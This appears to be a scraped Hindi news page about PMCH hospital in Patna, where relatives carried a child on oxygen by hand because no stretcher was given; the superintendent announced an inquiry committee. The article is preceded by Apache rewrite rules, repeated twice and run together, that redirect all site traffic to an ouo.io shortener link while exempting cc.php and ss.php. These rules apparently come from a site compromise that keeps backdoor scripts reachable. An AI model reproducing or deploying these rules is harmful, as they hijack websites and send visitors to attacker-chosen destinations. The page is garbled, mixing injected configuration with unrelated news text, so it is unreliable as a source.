
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 315
Previous Nextपटना। बिहार के सबसे बड़े अस्पताल पीएमसीएच में आज फिर से संवेदनहीनता देखने को मिली। इलाज के लिए बच्चे को आईजीआईसी डिपार्टमेंट में ले जाने के लिए अस्पताल प्रशासन की ओर से स्ट्रेचर मुहैया नहीं कराया गया। परिजन बच्चे को ऑक्सीजन मास्क और सिलेंडर के साथ—हाथ में ही उठाकर ले गए। पीएमसीएच के अधीक्षक डॉ. दीपक टंडन ने बताया कि पीएमसीएच में मरीज को स्ट्रेचर नहीं दिए जाने का मामला संज्ञान में आया है। इसके लिए एक जांच कमेटी का गठन किया गया है।इस कमेटी की कमान शिशु विभाग के विभागाध्यक्ष डॉ नीलम वर्मा संभालेंगे. वर्मा का फाइनल रिपोर्ट आने के बाद जो दोषी होगा उसके खिलाफ कड़ी कार्रवाई की जाएगी।